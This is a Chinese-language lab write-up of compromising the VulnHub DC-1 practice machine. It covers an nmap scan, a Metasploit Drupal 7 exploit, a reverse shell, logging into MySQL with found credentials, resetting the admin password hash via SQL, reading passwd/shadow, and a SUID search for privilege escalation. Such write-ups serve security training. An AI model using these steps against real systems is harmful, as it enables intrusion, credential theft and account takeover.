文章目录
前言
最近开始深入学习网络安全方面,深感自己所知甚少,下面是我渗透测试的整个过程
一、靶机介绍
我所用的靶机是在vulnhub上下载的,网址如下:
https://www.vulnhub.com/entry/dc-1-1,292/
里面有许多靶机可以供我们练习,我之后也将会花很多时间去练习,来提高自己的技术。
二、靶机安装
1.导入至VM
ps:VirtualBox类似,若无此类软件请自行百度
(1)解压文件
将下载的DC文件,如下图进行解压缩:
(2)搭建虚拟机
具体操作如下:
a.第一步:
b. 选择之前解压的文件
(3)构建内部网络
靶机和kali虚拟机网络都改为NAT模式
正常开机后如下图:
三、flag寻找
1、flag1
主机发现
arp-scan -l
端口扫描
nmap -sS -A 192.168.72.134
-sS :使用频率最高的扫描选项:SYN扫描,又称为半开放扫描,它不打开一个完全的TCP连接,执行得很快,效率高
-A : 综合扫描,包括系统探测,版本探测,脚本扫描,路由跟踪
从结果我们可以发现80端口的相关信息,使用的框架是Drupal 7
漏洞寻找
kali终端输入:
msfconsole
查找drupal,这里使用4,你们也可以试试其他的
``
查看使用方法:
查看为yes的部分,这里需要输入目标地址
set rhost 192.168.72.134
有时候也会需要设置源地址,使用如下代码:
set lhost eth0
因为我之前已经输入过一次,所以此处只需要设置目标地址,然后开始破解:
找到flag1
2、 flag2
查看flag1
这个意思是让我们去找网站的配制文件
执行如下代码:
cd sites
cd default
效果如图:
找到flag2
查看下配制文件,如图:
3、flag3
连接数据库
现在进入目标机shell环境,查看端口情况。命令:
netstat -ano
我们注意到,数据库只允许本地连接。所以,我们需要反弹一个shell出来。
反弹shell
这里使用python进行反弹
查看数据库
mysql -udbuser -pR0ck3t
查看库
查看数据库表
找到了用户表,看看里面都有哪些数据
admin用户的密码是加密的,不过没关系,我们可以修改其密码
先调用命令生成咱们设置的密文。明文是123456。命令:
php scripts/password-hash.sh 123456
得到
更新密码
update users set pass="$S$DMys1FOH6K6Xjyp4U8EYEdcNMZtugxZeP5xaU07y23rnn1GSWPwt" where name="admin"
尝试账号:admin密码:123456,在网站上登陆,可以成功登陆,并且发现提示
4、flag4
查看passwd和shadow文件
flag4
切换至/home/flag4 ,发现flag4
5、flag5
提权
root目录需要使用root用户查看
我们首先看有哪些是可以提权的
find / -type f -perm -u=s 2>/dev/null
提权成功
找到flag5
总结
目标靶机一共存在5个flag,咱们已经全部找到,上面用到的一些方法希望对大家有帮助。